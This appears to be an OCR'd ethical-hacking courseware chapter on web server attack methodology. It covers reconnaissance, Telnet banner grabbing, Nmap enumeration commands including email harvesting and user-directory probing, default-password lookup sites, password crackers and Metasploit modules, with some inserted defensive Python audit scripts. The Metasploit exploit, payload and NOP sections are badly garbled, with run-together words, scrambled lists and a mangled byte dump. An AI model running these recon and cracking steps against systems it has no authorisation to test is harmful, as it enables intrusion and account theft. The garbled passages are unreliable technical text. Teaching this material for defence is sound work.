Even if web servers are configured securely or are secured using network security measures such as firewalls, a poorly coded web application deployed on the web server may provide a
authenticated parts of a web application.
- SQL Injection Attacks: SQL injection exploits the security vulnerability of a database for attacks. The attacker injects malicious code into the strings, which are later passed on to the SQL server for execution.
- Directory Traversal: Directory traversal is the exploitation of HTTP through which attackers can access restricted directories and execute commands outside of the web server's root directory by manipulating a URL.
- Denial-of-Service (DoS) Attack: A DoS attack is intended to terminate the operations of a website or server to make it unavailable for access by its intended users.
- Cross-Site Scripting (XSS) Attacks: In this method, an attacker injects HTML tags or scripts into a target website.
- Buffer Overflow Attacks: The design of most web applications helps them in sustaining some amount of data. If that amount exceeds the storage space available, the application may crash or exhibit some other vulnerable behavior. An attacker uses this advantage and floods the application with an excess amount of data, causing a buffer overflow attack.
- Cross-Site Request Forgery (CSRF) Attack: An attacker exploits the trust of an authenticated user to pass malicious code or commands to the web server.
- Command Injection Attacks: In this type of attack, a hacker alters the content of the web page by using HTML code and by identifying the form fields that lack valid constraints.
- Source Code Disclosure: Source-code disclosure is a result of typographical errors in scripts or misconfiguration, such as failure to grant executable permissions to a script or directory. Source-code disclosure can occasionally allow attackers to access sensitive information about database credentials and secret keys to compromise the web server.
Module Flow: Web Server Concepts; Web Server Attacks; Web Server Attack Methodology; Countermeasures; Patch Management; Web Server Security Tools

Web Server Attack Methodology

The previous section described attacks that an attacker can perform to compromise a web server's security. This section explains how the attacker proceeds towards performing a successful attack on a web server. A web server attack typically involves preplanned activities called an attack methodology that an attacker follows to reach the goal of breaching the target web server's security.
Attackers hack a web server in multiple stages. At each stage, the attacker attempts to gather information about loopholes and to gain unauthorized access to the web server. The following are the various stages of the attack methodology for web servers:
- Information Gathering: Every attacker tries to collect as much information as possible about the target web server. The attacker gathers the information and then analyzes it to find lapses in the current security mechanisms of the web server.
- Web Server Footprinting: The purpose of footprinting is to gather information about the security aspects of a web server with the help of tools or footprinting techniques. Through footprinting, attackers can determine the web server's remote access capabilities, its ports and services, and other aspects of its security.
- Website Mirroring: Website mirroring is a method of copying a website and its content onto another server for offline browsing. With a mirrored website, an attacker can view the detailed structure of the website.
- Vulnerability Scanning: Vulnerability scanning is a method of finding the vulnerabilities and misconfigurations of a web server. Attackers scan for vulnerabilities with the help of automated tools known as vulnerability scanners.
- Session Hijacking: Attackers can perform session hijacking after identifying the current session of the client. The attacker takes complete control over the user session through session hijacking.
- Hacking Web Server Passwords: Attackers use password-cracking methods such as brute-force attacks, hybrid attacks, and dictionary attacks to crack the web server's password.
Information Gathering

Information gathering is the first and one of the most important steps toward hacking a target web server. In this step, an attacker collects as much information as possible about the target server by using various tools and techniques. The information obtained from this step helps the attacker in assessing the security posture of the web server. Attackers may search the Internet, newsgroups, bulletin boards, and so on for gathering information about the organization. Attackers can use tools such as Whois.net and Whois Lookup to extract information such as the target's domain name, IP address, and autonomous system number.

- WHOis.net
  Source: https://www.whois.net
  WHOis.net is designed to help users perform a variety of domain whois search functions. It lets the user perform a domain whois search, whois IP lookup, and whois database search for relevant information on domain registration and availability. It provides insight into a domain's history and additional information. The whois lookup can be used anytime to determine who owns a domain name, how many pages from a site are listed with Google, or even search whois address listings for a website's owner.
Figure 13.2: Screenshots displaying a WHOis.net search result

The following are some additional online information-gathering tools:
- Whois Lookup (https://whois.domaintools.com)
- Whois (https://www.whois.com)
- DNSstuff WHOIS/IPWHOIS Lookup (https://tools.dnsstuff.com)
- Domain Dossier (https://centralops.net)
- Find Subdomains (https://pentest-tools.com)

Note: For complete coverage of information-gathering techniques, refer to Module 02 Footprinting and Reconnaissance.
Information Gathering from Robots.txt File

The robots.txt file contains the list of the web server directories and files that the website owner wants to hide from web crawlers. An attacker can simply request the robots.txt file from the URL and retrieve sensitive information such as the root directory structure and content management system information about the target website.

A website owner creates a robots.txt file to list the files or directories a web crawler should index for providing search results. Poorly written robots.txt files can cause the complete indexing of website files and directories. If confidential files and directories are indexed, an attacker may easily obtain information such as passwords, email addresses, hidden links, and membership areas.

If the owner of the target website writes the robots.txt file without allowing the indexing of restricted pages for providing search results, an attacker can still view the robots.txt file of the site to discover restricted files and then view them to gather information. An attacker types URL/robots.txt in the address bar of a browser to view the target website's robots.txt file. An attacker can also download the robots.txt file of a target website using the Wget tool.
Figure 13.2: Screenshot displaying a robots.txt file
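An added example, not from the courseware, of auditing one's own robots.txt the way the section says an attacker reads it: the script parses the file into User-agent groups and lists every Disallow entry that names something an attacker would go and look at. The sample file and the list of sensitive keywords are constructed for this example.

```python
# Constructed robots.txt in the style of Figure 13.22 (not a real site's file).
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /*/search/
Disallow: /admin/
Disallow: /backup/          # comment: old site export
Disallow: /cms/login.aspx
Allow: /*/store/*/search/

User-agent: Googlebot
Disallow: /internal-reports/
"""

# Path fragments that suggest a protected area (assumed list for this example).
SENSITIVE_HINTS = ("admin", "backup", "login", "cms", "internal", "config", "private")


def parse_robots(text):
    """Return (user_agent, directive, path) records. '#' comments and unknown
    directives are ignored; records belong to the most recent User-agent line,
    which is how crawlers read the file."""
    records, agent = [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            agent = value
        elif key in ("allow", "disallow") and agent is not None:
            records.append((agent, key, value))
    return records


def exposed_paths(text):
    """Disallow entries that name something worth protecting. A Disallow line
    only asks well-behaved crawlers to stay away; to anyone reading the file it
    is a directory listing, so each such path must be protected by
    authentication on the server, not by robots.txt."""
    hits = []
    for _agent, directive, path in parse_robots(text):
        if directive == "disallow" and any(h in path.lower() for h in SENSITIVE_HINTS):
            hits.append(path)
    return sorted(set(hits))


if __name__ == "__main__":
    for path in exposed_paths(SAMPLE_ROBOTS):
        print("robots.txt advertises:", path)
```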
Web Server Footprinting/Banner Grabbing

By performing web server footprinting, an attacker can gather valuable system-level data such as account details, OSs, software versions, server names, and database schema details. The Telnet utility can be used to footprint a web server and gather information such as server name, server type, OSs, and running applications. Furthermore, footprinting tools such as Netcraft, ID Serve, and httprecon can be used to perform web server footprinting. These footprinting tools can extract information from the target server. Here, we examine the features and types of information these tools can collect from the target server.
Web Server Footprinting Tools

Figure 13.23: Screenshot of Netcraft

- Netcat
  Source: http://netcat.sourceforge.net
  Netcat is a networking utility that reads and writes data across network connections by using the TCP/IP protocol. It is a reliable "back-end" tool used directly or driven by other programs and scripts. It is also a network debugging and exploration tool. The following are the commands used to perform banner grabbing for www.moviescope.com as an example to gather information such as server type and

  Figure 13.24: Netcat output (Server identified as Microsoft-IIS/10.0)
- Telnet
  Source: https://docs.microsoft.com
  Telnet is a client-server network protocol that is widely used on the Internet or LANs. It provides login sessions for a user on the Internet. A single terminal attached to another computer emulates the session by using Telnet. The primary security issues with Telnet are the following:
  - It does not encrypt data sent through the connection.
  - It lacks an authentication scheme.
  Telnet enables an attacker to perform a banner-grabbing attack. It probes HTTP servers to determine the Server field in the HTTP response header. For instance, the following procedure is utilized to enumerate a host running on HTTP (TCP 80).
  - Request Telnet to connect to a host on a specific port with the command # telnet www.moviescope.com 80 and press Enter. A blank screen appears.
  - Type GET / HTTP/1.0 and press Enter twice. The HTTP server responds with the information shown in the screenshot.

  Figure 13.25: Telnet output (Server identified as Microsoft-IIS/10.0)
httprecon
Figure
Telnet
13.25: output
Source: https://www.computec.ch

httprecon is a tool for advanced web server fingerprinting. This tool performs banner-grabbing attacks, status code enumeration, and header ordering analysis on the target web server and provides accurate web server fingerprinting information. httprecon performs the following header analysis test cases on the target web server:
- A legitimate GET request for an existing resource
- An exceedingly long GET request (a Uniform Resource Identifier (URI) of >1024 bytes)
- A common GET request for a non-existing resource
- A common HEAD request for an existing resource
- Enumeration with OPTIONS, which is allowed
- The HTTP method DELETE, which is usually not permitted
- The HTTP method TEST, which is not defined
- The protocol version HTTP/9.8, which does not exist
- A GET request including attack patterns (e.g., ../ and %%)
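The banner grab shown above (Netcat or Telnet) and httprecon's header-ordering analysis both work from the raw response a server returns. The following Python script is an added example, not part of the courseware: it parses such a response, records the Server banner and the order of the headers (the signal httprecon uses), and lists the headers that disclose product or version information, which is the check an administrator runs against their own server to decide what to suppress. The response text is constructed, not captured from www.moviescope.com or any real host.

```python
"""Parse a raw HTTP response (as captured with netcat or telnet) and report
what its headers disclose. Added example, not part of the courseware; the
sample response is constructed, not captured from a real host."""
import re

# Constructed sample of what "GET / HTTP/1.0" returns from an IIS host.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "X-AspNet-Version: 4.0.30319\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Headers whose presence or version string helps fingerprint the host.
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-aspnet-version",
                      "x-aspnetmvc-version", "via")
VERSION_RE = re.compile(r"\d+(\.\d+)+")


def parse_response(raw):
    """Split a response into its status line and an ordered header list.
    Order is kept on purpose: it is a fingerprinting signal in itself."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return lines[0], headers


def fingerprint(raw):
    """Return the Server banner, the header-order signature and the
    disclosures an administrator would want to suppress."""
    status_line, headers = parse_response(raw)
    banner = None
    findings = []
    for name, value in headers:
        lname = name.lower()
        if lname == "server":
            banner = value
        if lname in DISCLOSING_HEADERS:
            kind = "version" if VERSION_RE.search(value) else "product"
            findings.append(f"{name} discloses a {kind}: {value}")
    return {
        "status_line": status_line,
        "server": banner,
        "header_order": [name for name, _ in headers],
        "findings": findings,
    }


if __name__ == "__main__":
    result = fingerprint(SAMPLE_RESPONSE)
    print("status      :", result["status_line"])
    print("server      :", result["server"])
    print("header order:", " > ".join(result["header_order"]))
    for finding in result["findings"]:
        print("finding     :", finding)
```

Run against a response saved from one's own server, the findings list is the set of headers to remove or neutralise in the server configuration; the header-order list is what remains as a fingerprint even after the banner itself is blanked.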
Figure 13.26: Screenshot of httprecon

ID Serve
Source: https://www.grc.com

ID Serve is a simple Internet server identification utility. The following is a list of its capabilities.
- HTTP Server Identification: ID Serve can identify the make, model, and version of a website's server software. This information is sent in the preamble of replies to web queries, but it is not visible to the user.
- Reverse DNS Lookup: When ID Serve users enter a site's domain name or server's URL, the application will use DNS to determine the IP address of that domain. However, it is occasionally useful to proceed in the other direction to determine the domain name associated with a known IP address. This process, known as reverse DNS lookup, is also built into ID Serve. ID Serve attempts to determine the associated domain name for any entered IP address.

Figure 13.27: Screenshot of ID Serve

The following are some additional footprinting tools:
- Recon-ng (https://github.com)
- Uniscan (https://sourceforge.net)
- Nmap (https://nmap.org)
- GhostEye (https://github.com)
- Skipfish (https://code.google.com)
Enumerating Web Server Information Using Nmap
Source: https://nmap.org

Nmap, along with the Nmap Scripting Engine (NSE), can extract a large amount of valuable information from the target web server. In addition to Nmap commands, NSE provides scripts that reveal various types of useful information about the target server to an attacker. An attacker uses the following Nmap commands and NSE scripts to extract information:
- Discover virtual domains with hostmap:
    $ nmap --script hostmap <host>
- Detect a server that uses the TRACE method:
    $ nmap --script http-trace -p80 localhost
- Harvest email accounts with http-google-email:
    $ nmap --script http-google-email <host>
- Enumerate users with http-userdir-enum:
    $ nmap -p80 --script http-userdir-enum localhost
- Detect HTTP TRACE:
    $ nmap -p80 --script http-trace <host>
- Check if the web server is protected by a web application firewall (WAF) or IPS
- Enumerate common web applications:
    $ nmap --script http-enum -p80 <host>
- Obtain robots.txt:
    $ nmap -p80 --script http-robots.txt <host>

The following are some additional Nmap commands used to extract web server information:
    nmap -sV -O -p <target IP address>
    nmap -sV --script http-enum <target IP address>
    nmap <target IP address> -p 80 --script http-frontpage-login

Figure 13.28: Screenshot of Nmap
Website Mirroring

Website mirroring copies an entire website and its content onto a local drive. The mirrored website reveals the complete profile of the site's directory structure, file structure, external links, images, web pages, and so on. With a mirrored target website, an attacker can easily map the website's directories and gain valuable information. An attacker who copies the website does not need to be online to go through the target website. Furthermore, the attacker can gain valuable information by searching the comments and other items in the HTML source code of downloaded web pages. Many website mirroring tools can be used to copy a target website onto a local drive; examples include NCollector Studio, HTTrack WebSite Copier, WebCopier Pro, and Website Ripper Copier.

NCollector Studio
Source: http://www.calluna-software.com

NCollector Studio is a website mirroring tool used to download content from the web to a local computer. This tool enables users to crawl for specific file types, make any website available for offline browsing, or simply download a website to a local computer.
Figure 13.29: Screenshot of NCollector Studio

The following are some additional website mirroring tools:
- HTTrack WebSite Copier (https://www.httrack.com)
- WebCopier Pro (http://www.maximumsoft.com)
- Website Ripper Copier (https://www.tensons.com)
- WebRipper (http://visualwebripper.com)
- Cyotek WebCopy (https://www.cyotek.com)
Finding Default Credentials of Web Server

Many web server administrative interfaces are publicly accessible and are located in the web root directory. Often, these administrative interface credentials are not properly configured and remain set to default. Attackers identify the running application and then log in to the administrative interface with the default credentials. Attackers use the following techniques to find default credentials:
- Consult the administrative interface documentation
- Use Metasploit's built-in database to scan the server
- Use online resources such as Open Sez Me (http://open-sez.me) and cirt.net (https://cirt.net/passwords) to identify the default passwords
- Attempt password-guessing and brute-forcing attacks

These default credentials can grant access to the administrative interface, compromising the web server and allowing the attacker to exploit the main web application.

Source: https://cirt.net/passwords

Cirt.net is a lookup database for default passwords, credentials, and ports.
Figure 13.30: Screenshot of cirt.net displaying the default password page

The following are some additional websites for finding default passwords of server administrative interfaces:
- http://open-sez.me
- https://www.fortypoundhead.com
- http://www.defaultpassword.us
- https://default-password.info
- https://www.routerpasswords.com
Finding Default Content of Web Server

Sample functionality to demonstrate common tasks
Many servers contain various scripts and pages designed to demonstrate certain application server functions and application programming interfaces (APIs). Often, web servers fail to secure these scripts from attackers, and these sample scripts either contain vulnerabilities that can be exploited by attackers or implement functionalities that allow attackers to exploit.

Publicly accessible powerful functions
Some web servers include powerful functionalities that are intended for administrative personnel and restricted from public use. However, attackers attempt to exploit such powerful functions to compromise the server and gain access. For example, some application servers allow web archives to be deployed over the same HTTP port as that used by the application. An attacker may use common exploitation frameworks such as Metasploit to perform scanning to identify default passwords, upload backdoors, and gain command-shell access to the target server.
Server installation manuals
An attacker attempts to identify server manuals, which may contain useful information about configuration and server installation. Accessing this information allows the attacker to prepare an appropriate framework to exploit the installed web server.

Tools such as Nikto2 and exploit databases such as SecurityFocus (https://www.securityfocus.com) can be used to identify default contents.

Nikto2
Source: https://cirt.net

Nikto is a vulnerability scanner used extensively to identify potential vulnerabilities in web applications and web servers.

Figure 13.31: Screenshot of Nikto2
Finding Directory Listings of Web Server

When a web server receives a request for a directory, rather than a file, the web server may return the default resource within the directory or respond with a listing of the directory's contents ("Index of /"). Attackers try to discover directory listings and exploit vulnerable web server software that gives access to the directory listings in order to compromise the web server.
Figure 13.32: Screenshot displaying a sample directory listing

Though directory listings do not have significant relevance from a security perspective, they occasionally possess the following vulnerabilities that allow attackers to compromise web applications:
- Improper access controls
- Unintentional access to the web root of servers

In general, after discovering a directory on a web server, an attacker makes a request for that directory and attempts to access the directory listing. Attackers also attempt to exploit vulnerable web server software that grants access to directory listings.
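Defensive counterpart to the above, as an added example that is not part of the courseware: a Python check that recognises an Apache-style autoindex page and lists the non-web files it exposes, so an administrator can confirm that directory listings are disabled and that backup, archive and dump files have been removed from the web root (both are countermeasures named later in this module). The listing HTML is constructed, not captured from a real server.

```python
"""Recognise a served directory listing and flag the non-web files in it.
Added example, not part of the courseware; the HTML is a constructed
Apache-style autoindex page, not captured from a real server."""
from html.parser import HTMLParser

SAMPLE_LISTING = """<html><head><title>Index of /backup</title></head>
<body><h1>Index of /backup</h1>
<pre><a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a>
<hr><a href="/">Parent Directory</a>
<a href="db_dump.sql">db_dump.sql</a>        2018-01-19 18:03   93K
<a href="site.tar.gz">site.tar.gz</a>        2018-01-19 18:03   1.3M
<a href="config.php.bak">config.php.bak</a>  2018-01-19 18:03   2.6K
<a href="index.html">index.html</a>          2018-01-19 18:03   1.3K
<a href="images/">images/</a>                2018-01-19 18:03   -
<hr></pre></body></html>"""

# File types the countermeasures in this module say should not be served
# from the web root: archives, backups, dumps, text and include files.
SENSITIVE_SUFFIXES = (".bak", ".old", ".orig", ".sql", ".tar", ".tar.gz",
                      ".tgz", ".zip", ".7z", ".txt", ".inc", ".log")


class ListingParser(HTMLParser):
    """Collect the <title> text and every entry link of an autoindex page."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self._in_title = False
        self.entries = []

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "a":
            href = dict(attrs).get("href") or ""
            # Skip the column-sort links (?C=...) and the parent link (/).
            if href and not href.startswith(("?", "/")):
                self.entries.append(href)

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def analyse_listing(html):
    """Return whether the page is a directory listing, the files and
    subdirectories it exposes, and the files that should not be there."""
    parser = ListingParser()
    parser.feed(html)
    title = parser.title.strip()
    is_listing = title.lower().startswith("index of")
    files = [e for e in parser.entries if not e.endswith("/")]
    subdirs = [e for e in parser.entries if e.endswith("/")]
    return {
        "is_listing": is_listing,
        "path": title[len("Index of"):].strip() if is_listing else None,
        "files": files,
        "subdirs": subdirs,
        "sensitive": [f for f in files if f.lower().endswith(SENSITIVE_SUFFIXES)],
    }


if __name__ == "__main__":
    report = analyse_listing(SAMPLE_LISTING)
    if report["is_listing"]:
        print(f"directory listing served for {report['path']}")
        for name in report["sensitive"]:
            print("  remove or block:", name)
```

The title check is deliberately loose ("Index of" is what Apache and nginx autoindex both emit); a site whose own pages use that title would need a second signal such as the sort links, which the parser already sees.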
Vulnerability Scanning

Vulnerability scanning is performed to identify vulnerabilities and misconfigurations in a target web server or network. Vulnerability scanning reveals possible weaknesses in a target server to exploit in a web server attack. In the vulnerability-scanning phase, attackers use sniffing techniques to obtain data on the network traffic to determine active systems, network services, and applications. Automated tools such as Acunetix Web Vulnerability Scanner are used to perform vulnerability scanning on a target server and find hosts, services, and vulnerabilities.

Acunetix Web Vulnerability Scanner
Source: https://www.acunetix.com

Acunetix Web Vulnerability Scanner (WVS) scans websites and detects vulnerabilities. Acunetix WVS checks web applications for SQL injections, XSS, and so on. It includes advanced pen testing tools to ease manual security audit processes and creates professional security audit and regulatory compliance reports based on AcuSensor Technology. It supports the testing of web forms and password-protected areas, pages with CAPTCHA, single sign-on, and two-factor authentication mechanisms. It detects application languages, web server types, and smartphone-optimized sites. Acunetix crawls and analyzes different types of websites, including HTML5, Simple Object Access Protocol (SOAP), and Asynchronous JavaScript and Extensible Markup Language (AJAX). It supports the scanning of network services running on the server and the port scanning of the web server.
Figure 13.33: Screenshot of Acunetix Web Vulnerability Scanner

The following are some additional vulnerability scanning tools:
- Fortify WebInspect (https://www.microfocus.com)
- Tenable.io (https://www.tenable.com)
- Immuniweb (https://www.immuniweb.com)
- Netsparker (https://www.netsparker.com)
Finding Exploitable Vulnerabilities

Flaws in software design and programming errors lead to security vulnerabilities. Attackers take advantage of these vulnerabilities to perform various attacks on the confidentiality, availability, or integrity of a system. Software vulnerabilities such as programming flaws in a program, service, or within the OS software or kernel can be exploited to execute malicious code. Many public vulnerability repositories that are available online allow access to information about various software vulnerabilities. Attackers search on exploit sites such as SecurityFocus (https://www.securityfocus.com) and Exploit Database (https://www.exploit-db.com) for exploitable vulnerabilities of a web server based on its OS and software applications. Attackers use the information gathered in the previous stages to find the relevant vulnerabilities by using Exploit Database. Exploiting these vulnerabilities allows attackers to execute a command or binary on a target machine to gain higher privileges than existing ones or to bypass security mechanisms. Attackers using these exploits can even access privileged user accounts and credentials.

Figure 13.34: Screenshot of Google Hacking Database (GHDB)
Session Hijacking

Valid session IDs can be sniffed to gain unauthorized access to a web server and snoop its data. An attacker can hijack or steal valid session content using various techniques such as session token prediction, session replay, session fixation, sidejacking, and XSS. By using these techniques, the attacker attempts to capture valid session cookies and IDs in established sessions. The attacker uses tools such as Burp Suite, Firesheep, and JHijack to automate session hijacking.

Burp Suite
Source: https://portswigger.net

Burp Suite is a web security testing tool that can hijack session IDs in established sessions. The Sequencer tool in Burp Suite tests the randomness of session tokens. With this tool, an attacker can predict the next possible session ID token and use that to take over a valid session.
Figure 13.35: Screenshot of Burp Suite

The following are some additional session hijacking tools:
- JHijack (https://sourceforge.net)
- Ettercap (https://ettercap.github.io)
- CookieCatcher (https://github.com)
- CookieCadger (https://github.com)

Note: For complete coverage of concepts and techniques related to session hijacking, refer to Module 11: Session Hijacking.
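What Burp Sequencer measures can be approximated in a few lines, and a developer can run the same measurement on their own session-ID generator before anyone else does. The following Python script is an added example, not part of the courseware or of Burp Suite: it samples a generator, computes the Shannon entropy of each character position across the sample, and sums them as a rough estimate of the bits that actually vary. Both generators are constructed for the comparison; weak_token stands in for the counter-based schemes that make the next ID predictable, and strong_token uses the OS CSPRNG via the secrets module.

```python
"""A simplified version of the randomness check Burp Sequencer performs on
session tokens. Added example, not part of the courseware or of Burp Suite;
both generators are constructed for the comparison."""
import itertools
import math
import secrets
from collections import Counter

_counter = itertools.count(1000)


def weak_token():
    """Constructed weak generator: a global counter padded to 32 hex digits.
    Every ID is predictable from the previous one."""
    return f"{next(_counter):032x}"


def strong_token():
    """128 bits from the OS CSPRNG, which is what a session ID should be."""
    return secrets.token_hex(16)


def position_entropy_bits(tokens):
    """Shannon entropy, in bits, of each character position across the sample."""
    n = len(tokens)
    result = []
    for i in range(len(tokens[0])):
        counts = Counter(t[i] for t in tokens)
        result.append(-sum(c / n * math.log2(c / n) for c in counts.values()))
    return result


def assess_generator(gen, samples=2000, min_bits=64):
    """Sample `gen`, sum the per-position entropies as an estimate of the bits
    that actually vary, and compare against `min_bits`. The sum is a rough
    estimate only: correlated positions inflate it, and each position is
    capped at log2(samples), so a small sample understates a strong
    generator. Treat a low score as a definite failure and a high score as
    necessary but not sufficient."""
    tokens = [gen() for _ in range(samples)]
    if len({len(t) for t in tokens}) != 1:
        raise ValueError("tokens must be fixed-length for a per-position analysis")
    bits = position_entropy_bits(tokens)
    total = sum(bits)
    return {
        "estimated_bits": round(total, 1),
        "fixed_positions": sum(1 for b in bits if b == 0.0),
        "acceptable": total >= min_bits,
    }


if __name__ == "__main__":
    for name, gen in (("weak_token", weak_token), ("strong_token", strong_token)):
        r = assess_generator(gen)
        print(f"{name}: ~{r['estimated_bits']} bits vary, "
              f"{r['fixed_positions']} positions never change, "
              f"acceptable={r['acceptable']}")
```

The counter-based generator scores around a dozen bits with almost every position fixed, while the CSPRNG generator scores close to the full 128 bits; the fixed_positions count alone is usually enough to reject a weak scheme.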
Web Server Password Hacking

In this phase of web server hacking, an attacker attempts to crack web server passwords. The attacker may employ all possible techniques of password cracking to extract passwords, including password guessing, dictionary attacks, brute-force attacks, hybrid attacks, precomputed hashes, rule-based attacks, distributed network attacks, and rainbow attacks. The attacker needs patience to crack passwords because some of these techniques are tedious and time-consuming. The attacker can also use automated tools such as Hashcat, THC Hydra, and Ncrack to crack web passwords and hashes.

Hashcat
Source: https://hashcat.net

Hashcat is a cracker compatible with multiple OSs and platforms and can perform multi-hash (MD4, MD5; SHA-224, SHA-256, SHA-384, SHA-512; RIPEMD-160; etc.), multi-device password cracking. The attack modes of this tool are straight, combination, brute force, hybrid dict + mask, and hybrid mask + dict.
Figure 13.36: Screenshot of Hashcat password cracker

THC Hydra
Source: https://github.com

THC Hydra is a parallelized login cracker that can attack numerous protocols. This tool is proof-of-concept code that provides researchers and security consultants the possibility to demonstrate how easy it would be to gain unauthorized remote access to a system. It supports protocols including Cisco enable; Concurrent Versions System (CVS); Firebird; FTP; HTTP-FORM-GET; HTTP-FORM-POST; HTTP-GET; HTTP-HEAD; HTTP-POST; HTTP-PROXY; HTTPS-FORM-GET; HTTPS-FORM-POST; HTTPS-GET; HTTPS-HEAD; HTTPS-POST; HTTP-Proxy; ICQ; Internet Message Access Protocol (IMAP); Internet Relay Chat (IRC); Lightweight Directory Access Protocol (LDAP); Memcached; MongoDB; Microsoft SQL Server; MySQL; Network Control Protocol (NCP); Network News Transfer Protocol (NNTP); Oracle Listener; Oracle system identifier (SID); Oracle; PC-Anywhere; personal computer Network File System (PC-NFS); POP3; Postgres; Radmin; Remote Desktop Protocol (RDP); Rexec; Rlogin; Rsh; Real Time Streaming Protocol (RTSP); SAP R/3; Session Initiation Protocol (SIP); Server Message Block (SMB); Simple Mail Transfer Protocol (SMTP); SMTP Enum; Simple Network Management Protocol (SNMP) v1+v2+v3; SOCKS5; SSH (v1 and v2); SSH key; Subversion; TeamSpeak (TS2); Telnet; VMware-Auth; Virtual Network Computing (VNC); and Extensible Messaging and Presence Protocol (XMPP).
Figure 13.37: Screenshot of THC Hydra password cracker

The following are some additional password cracking tools:
- Ncrack (https://nmap.org)
- RainbowCrack (http://project-rainbowcrack.com)
- Wfuzz (http://www.edge-security.com)
- Wireshark (https://www.wireshark.org)
Using Application Server as a Proxy

Web servers are occasionally configured to perform functions such as forwarding or reverse HTTP proxy. Web servers with these functions enabled are employed by attackers to perform the following attacks:
- Attacking third-party systems on the Internet

Figure 13.38: Illustration of the use of an application server as a proxy
Module Flow: Web Server Concepts, Web Server Attacks, Web Server Attack Methodology, Web Server Attack Tools, Countermeasures, Patch Management, Web Server Security Tools
Metasploit
Source: https://www.metasploit.com

The Metasploit Framework is a penetration-testing toolkit, exploit development platform, and research tool that includes hundreds of working remote exploits for various platforms. It performs fully automated exploitation of web servers by abusing known vulnerabilities and leveraging weak passwords via Telnet, SSH, HTTP, and SNMP.
Figure 13.39: Screenshot of Metasploit

An attacker may use the following features of Metasploit to perform a web server attack:
- Closed-loop vulnerability validation
- Phishing simulations
- Social engineering
- Manual brute forcing
- Manual exploitation
- Evade-leading defensive solutions

Metasploit enables pen testers to perform the following:
- Quickly complete pen-test assignments by automating repetitive tasks and leveraging multi-level attacks
- Assess the security of web applications, network and endpoint systems, as well as email users
- Tunnel any traffic through compromised targets to pivot deep into a network
- Customize the content and template of executive, audit, and technical reports
Metasploit Architecture

The Metasploit Framework is an open-source exploitation framework that provides security researchers and pen testers with a uniform model for the rapid development of exploits, payloads, encoders, no operation (NOP) generators, and reconnaissance tools. The framework reuses large chunks of code that a user would otherwise have to copy or re-implement on a per-exploit basis. The framework is modular in architecture and encourages the reuse of code across various projects. The framework can be broken down into a few different pieces, the lowest level of which is the framework core. The framework core is responsible for implementing all the required interfaces that allow interaction with exploit modules, sessions, and plugins. It supports vulnerability research, exploit development, and the creation of custom security tools.
Metasploit
‘MetasploitExploitModule
It is a basicmodulei n Metasploit a single
usedto encapsulate exploit,
usingwhichusers
targetmanyplatforms. Thismodulehassimplifiedmeta-informationfields.Usingthe
Mixins feature, users can alsodynamicallymodify
exploit
behavior,
perform brute-force
attacks, andattemptpassive exploits,
A system can beexploitedwith the Metasploit
Framework through
the followingsteps:
©
Configure
Verify
an active
the exploit
exploit
options
Selecta target
Selecta payload
Launchthe exploit
‘Metasploit
Payload Module
exploit
‘An carries a payload
i n its backpackwhenit breaksinto a system
andthenleaves
the backpackthere.Thefollowing threetypesof payload modulesare provided
bythe
Metasploit
Framework,
gles: andcompletely
Self-contained standalone
©
©.
Stagers:
Setsup
Stages:
anetwork
connection
the
between attacker andvictim
bystagermodules
Downloaded
ical andCountermensores
Mackin ©by E-Comel
Copyright
A payload module can upload and download files from the system, take screenshots, and collect password hashes. It can even take over the screen, mouse, and keyboard to control a computer remotely. The payload module establishes a communication channel between the Metasploit framework and the victim host. It combines arbitrary code that is executed as the result of an exploit succeeding. To generate payloads, a payload is first selected using the command shown in the screenshot.

Figure 13.41: Screenshot displaying the Metasploit payload command

Metasploit Auxiliary Module

Auxiliary modules of Metasploit can be used to perform arbitrary, one-off actions such as port scanning, DoS, and even fuzzing. It includes tools and modules that assess the security of the target as well as auxiliary modules such as scanners, DoS modules, and fuzzers. The show auxiliary command in Metasploit can be used to list all the available auxiliary modules in Metasploit. All modules in Metasploit other than the ones used to exploit are auxiliary modules. Metasploit uses auxiliary modules as an extension for various purposes other than exploitation. Auxiliary modules are stored in the modules/auxiliary/ directory of the framework's main directory. The run command or the exploit command can be used to run an auxiliary module.
Figure 13.42: Screenshot displaying Metasploit auxiliary module commands

The basic definition of an auxiliary module is as follows:

    require 'msf/core'
    class Metasploit3 < Msf::Auxiliary
      p "My Auxiliary Module"
    end # for the class definition

Metasploit NOPS Module

NOP modules generate no-operation instructions used for blocking out buffers. The generate command can be used to generate a NOP sled of arbitrary size and display it in a given format.

Options:
    -b <opt>: A list of characters to avoid ("\x00\xff")
    -h: Help banner
    -s <opt>: A comma separated list of registers to save
    -t <opt>: The output type (Ruby, Perl, or raw)

The following command is used to generate a NOP sled of a given length:

    msf > use x86/opty2
    msf nop(opty2) > generate -h
    Usage: generate [options] length

The following command is used to generate a 50-byte NOP sled (the byte values below are as far as they are legible in the screenshot):

    msf nop(opty2) > generate -t c 50
    unsigned char buf[] =
    "\x24\xb1\xbe\x3f\x43\x1d\x93\xb2\x37\x35\x84\xd \x40\xb x14"
    "\xb3 xd"
    "\x41\xb9\x48\x04\x99\x46\x29\xb0\xb7\x2f\xfd\x96\xda\x98"
    "\x92\xb5\ \x4f\x91";
    msf nop(opty2) >
Web Server Attack Tools

Immunity's CANVAS
Source: https://www.immunityinc.com

